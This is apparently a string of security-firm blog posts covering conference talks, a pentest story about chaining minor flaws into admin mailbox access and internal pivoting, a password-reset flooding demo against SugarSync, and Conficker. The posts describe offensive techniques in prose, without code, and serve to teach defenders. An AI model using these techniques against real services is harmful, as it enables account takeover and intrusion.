We recently gave a talk at the ITWeb Security Summit entitled "Offense Oriented Defence". The talk was targeted at defenders and auditors, rather then hackers (the con is oriented that way), although it's odd that I feel the need to apologise for that ;)
The talks primary point, was that by understanding how attackers attack, more innovative defences can be imagined. The corollary was that common defences, in the form of "best practise" introduce commonality that is more easily exploited, or at least degrade over time as attackers adapt. Finally, many of these "security basics" are honestly hard, and we can't place the reliance on them we'd hoped. But our approach doesn't seem to want to acknowledge the problem, and much like an AA meeting, it's time we recognise the problem.
If you had to look at the average security strategy or budget items, you often end up with a list containing a couple of these:
But, the truth is many of these items don't actually block attacks, or the few that do, don't really counter the common bypassed used to side-step them. For example:
The current place we seem to be in is akin to having everyone build a wall. Attackers get to evaluate the wall, figure out how to get over it, and add to their capability (i.e. get a longer rope). But once they have a longer rope, they can use it over and over again, and against more than one wall. So attackers, who are quite good at sharing, get to keep building their tool chain, while all defenders can do it to keep building a higher wall, and maintaining the increasingly untenable structure. By understanding how attackers attack, we can break out of this and try more innovative approaches.
The talk is illustrated with four broad examples: Passwords, Patches, Anti-Virus and DMZs. For each, the belief around specific configurations is discussed, and how those don't stand up to how attackers actually attack. For example, the way AV's believed to work doesn't seem to correspond with how easy they are to bypass, or the common configuration of standard password controls such as lockout, don't seem to take into account horizontal brute-force attacks.
The point I want to make here is somewhat subtle; if you walk away thinking I've described new attacks, then you've missed it, if you think I'm recommending "the basics" then you've missed it. Truthfully, maybe it's just that I didn't make it very well ... decide for yourself, here are the slides:
You've probably never thought of this, but the home automation market in the US was worth approximately $3.2 billion in 2010 and is expected to exceed $5.5 billion in 2016.
Under the hood, the Zigbee and Z-wave wireless communication protocols are the most common used RF technology in home automation systems. Zigbee is based on an open specification (IEEE 802.15.4) and has been the subject of several academic and practical security researches. Z-wave is a proprietary wireless protocol that works in the Industrial, Scientific and Medical radio band (ISM). It transmits on the 868.42 MHz (Europe) and 908.42MHz (United States) frequencies designed for low-bandwidth data communications in embedded devices such as security sensors, alarms and home automation control panels.
Unlike Zigbee, almost no public security research has been done on the Z-Wave protocol except once during a DefCon 2011 talk when the presenter pointed to the possibility of capturing the AES key exchange ... until now. Our Black Hat USA 2013 talk explores the question of Z-Wave protocol security and show how the Z-Wave protocol can be subjected to attacks.
The talk is being presented by Behrang Fouladi a Principal Security Researcher at SensePost, with some help on the hardware side from our friend Sahand Ghanoun. Behrang is one of our most senior and most respected analysts. He loves poetry, movies with Owen Wilson, snowboarding and long walks on the beach. Wait - no - that's me. Behrang's the guy who lives in London and has a Masters from Royal Holloway. He's also the guy who figured how to clone the SecureID software token.
Amazingly, this is the 11th time we've presented at Black Hat Las Vegas. We try and keep track of our talks and papers at conferences on our research services site, but for your reading convenience, here's a summary of our Black Hat talks over the last decade:
Setiri was the first publicized trojan to implement the concept of using a web browser to communicate with its controller and caused a stir when we presented it in 2002. We were also very pleased when it got referenced by in a 2004 book by Ed Skoudis.
A paper about targeted, effective, automated attacks that could be used in countrywide cyber terrorism. A worm that targets internal networks was also discussed as an example of such an attack. In some ways, the thinking in this talk eventually lead to the creation of Maltego.
Our thinking around pentest automation, and in particular footprinting and link analyses was further expanded upon. Here we also released the first version of our automated footprinting tool - "Bidiblah".
In this talk we literally did introduce two proxy tools. The first was "Suru', our HTTP MITM proxy and a then-contender to the @stake Web Proxy. Although Suru has long since been bypassed by excellent tools like "Burp Proxy" it introduced a number of exciting new concepts, including trivial fuzzing, token correlation and background directory brute-forcing. Further improvements included timing analysis and indexable directory checks. These were not available in other commercial proxies at the time, hence our need to write our own.
The second proxy we introduced operated at the TCP layer, leveraging off the very excellent Scappy packet manipulation program. We never took that any further, however.
This was one of my favourite SensePost talks. It kicked off a series of research projects concentrating on timing-based inference attacks against all kinds of technologies and introduced a weaponized timing-based data exfiltration attack in the form of our Squeeza SQL Injection exploitation tool (you probably have to be South African to get the joke). This was also the first talk in which we Invented Our Own Acronym.
In this talk we expanded on our ideas of using timing as a vector for data extraction in so-called 'hostile' environments. We also introduced our 'reDuh' TCP-over-HTTP tunnelling tool. reDuh is a tool that can be used to create a TCP circuit through validly formed HTTP requests. Essentially this means that if we can upload a JSP/PHP/ASP page onto a compromised server, we can connect to hosts behind that server trivially. We also demonstrated how reDuh could be implemented under OLE right inside a compromised SQL 2005 server, even without 'sa' privileges.
Yup, we did cloud before cloud was cool. This was a presentation about security in the cloud. Cloud security issues such as privacy, monoculture and vendor lock-in are discussed. The cloud offerings from Amazon, Salesforce and Apple as well as their security were examined. We got an email from Steve "Woz" Wozniak, we quoted Dan Geer and we had a photo of Dino Daizovi. We built an HTTP brute-forcer on Force.com and (best of all) we hacked Apple using an iPhone.
This was a presentation about mining information from memcached. We introduced go-derper.rb, a tool we developed for hacking memcached servers and gave a few examples, including a sexy hack of bps.org. It seemed like people weren't getting our point at first, but later the penny dropped and we've to-date had almost 50,000 hits on the presentation on Slideshare.
Python's Pickle module provides a known capability for running arbitrary Python functions and, by extension, permitting remote code execution; however there is no public Pickle exploitation guide and published exploits are simple examples only. In this paper we described the Pickle environment, outline hurdles facing a shellcoder and provide guidelines for writing Pickle shellcode. A brief survey of public Python code was undertaken to establish the prevalence of the vulnerability, and a shellcode generator and Pickle mangler were written. Output from the paper included helpful guidelines and templates for shellcode writing, tools for Pickle hacking and a shellcode library.We also wrote a very fancy paper about it all...
For this year's show we'll back on the podium with Behrang's talk, as well an entire suite of excellent training courses. To meet the likes of Behrang and the rest of our team please consider one of our courses. We need all the support we can get and we're pretty convinced you won't be disappointed.
See you in Vegas!
In light of recent mass hacks (HBGary, Sony, Nintendo, etc) one would have thought that collectively, companies would take notice and at least be slightly more aware of the potential implications vulnerabilities in public-facing services could have.
The problem appears to be that these hacks, and indeed hackers, aren't that technically superior and more often than not, take advantage of simple flaws. Some flaws, like SQL injection, provide so much access on their own that a fairly grim attack scenario can be painted. However, often attackers don't require such extravagant flaws to gain access. Chained attacks utilising "low risk" attacks can be far more deadly than a single flaw.
We had an interesting scenario recently which demonstrated this. This is one example of how we use these minor flaws to gain access, and also show how the house of cards can fall quite spectacularly when basic security principles are not adhered to. We were on a fairly bread and butter security assessment; perform an analysis of the target (a large multinational) and determine where their weaknesses were from an unauthenticated perspective. Increasingly, we advise against unauthenticated assessments as we feel we can offer more value when you assume the shell is already cracked, but this was a special case.
The web application was good; it soon became clear that the developers had followed guidelines for the development of secure applications and ensured that common attacks were indeed handled in a suitable manner. What they didn't do, however, was apply a stringent hardening process to the server itself, and as the platitude goes "security is only as good as the weakest link."
The analyst had already obtained all administrative user names and passwords (stored in a database with no protection at all) and had logged into a number to confirm access. My email, now forwarded in the clear, was sent to all involved with a stern "fix it". Since we had access to the mailboxes, we saw an admin send the reply: "..have changed the password. Ask them to check if the password is strong now, there's no way they can get in now."
Yes, the password was indeed strong and certainly constructed in a recommended manner, but the administrator's account was already compromised and we were monitoring communications. This wasn't an appropriate response, it's a bit like using AV to clean a virus from a box, post-infection, instead of rebuilding it. Some data mining through multiple unencrypted mailboxes provided numerous credentials for other servers inside the network. We could pivot through the internal network to our hearts content, while monitoring their comms to make sure our supply line wasn't under threat.
Takeaway I: Once an attacker is inside the perimeter, trying to control intruder access at the perimeter is a game you've already lost. i.e. Blocking the path in, doesn't mean you've blocked the paths in use.
Starting with a simple directory listing flaw, one that Nessus rates as a "low" risk, the house of cards fell at an alarming rate. Security isn't about looking only at the high risks, because attackers won't limit themselves the same way.
To this end, different types of session identifiers were examined. The thinking was that by bruting session IDs instead of credentials the monitoring systems might be less likely to pickup the attack, and the cloud gives the attacker vast amounts of bandwidth and processing power that was not previously available. However even with access to cloud resources, most "strong" session IDs would still be large enough to avoid this attack (think 128-bit sessions such as those stored in ASP.NET cookies).
Of course, authentication tokens are not necessarily only stored in session carriers such as cookies/urls/hidden fields. A number of sites use a randomly generated link to effect a password reset, and if these random links can be brute-forced then the attacker still gains access to the account.
Thus, in the following set of videos we show how an attacker can generate a huge number of password reset links on the one hand, each of which is valid for the target account (he doesn't get to see the links). The final step would be to randomly guess links until one is hit (left as an exercise to the reader).
Users can sign-up for free trial accounts and upload/store/share files via the web interface, which is where authentication is handled. There were also client-side options, but we didn't examine these.
Here we show how the password reset process works for SugarSync.
The next video is short, and shows the execution of a Python script that submits many password reset requests for a single account.
The final SugarSync video shows the masses of reset emails that were sent to the user.
Two items were of interest:
The recent widespread carnage caused by the Conficker worm is astounding, but is also comforting, in a strange way.
It has been a good few years since the world saw a worm outbreak of this magnitude. Indeed, since the Code Red, Slammer and Blaster days, things have been fairly quiet on the Interwebs front.
As a community, it seems we very quickly forgot the pains caused by these collective strains of evil. Many people proclaimed the end of issues of that particular bent, whether it be as a result of prolific post-worm hastily induced reaction buying of preventative technologies and their relatives, or whether more faith was placed in software vendors preventing easily "wormable" holes in their software.
Needless to say, Conficker turned those theories a little on their head. Wikipedia notes on the impact of the worm gleaned from various sources seem to say it all:
The New York Times reported that Conficker had infected 9 million PCs by 22 January 2009, while The Guardian estimated 3.5 million infected PCs. By 16 January 2009, antivirus software vendor F-Secure reported that Conficker had infected almost 9 million PCs. As of January 26 2009, Conficker had infected more than 15 million computers, *making it one of the most widespread infections in recent times*.
We saw similar turmoil when a large organization in South Africa was hit incredibly hard by this worm, and was struggling to resolve the resulting chaos, even with the assistance of their security software vendors. Thankfully, it all ended happily for them, as the issue was resolved, but it's plain to see where this could go wrong and affect many organizations similarly.
I did mention up front that I found this all to be comforting (granted, this may be a slightly twisted viewpoint, but it really is how I feel about it). The reason I find this comforting is that perhaps as a collective, we needed a fresh wake-up call. They say that complacency kills, and I know that many organizations have become rather complacent of late...
Consider how Conficker works and spreads - missing patches leading to RPC-based buffer overflows in the Microsoft Server Service, brute-force attacks on weak passwords, spreading through file shares...hold on...does this sound at all familiar? Aren't these issues all addressed by basic security best practices 1 oh 1?
Organizations that had adopted reasonably robust internal security measures - hardening and patching policies, internal security assessments, solid internal vulnerability and compliance management solutions - they would have smiled through the Conficker onslaught..
I don't only say this because we play squarely in the assessment and vulnerability management spaces - I say this because the same steps that would have protected against Code Red, Slammer, Blaster and friends, would have protected against Conficker... best practice 1 oh 1..
I guess every now and then, we all need a reminder of just how essential the basics that we all tend to overlook actually are :>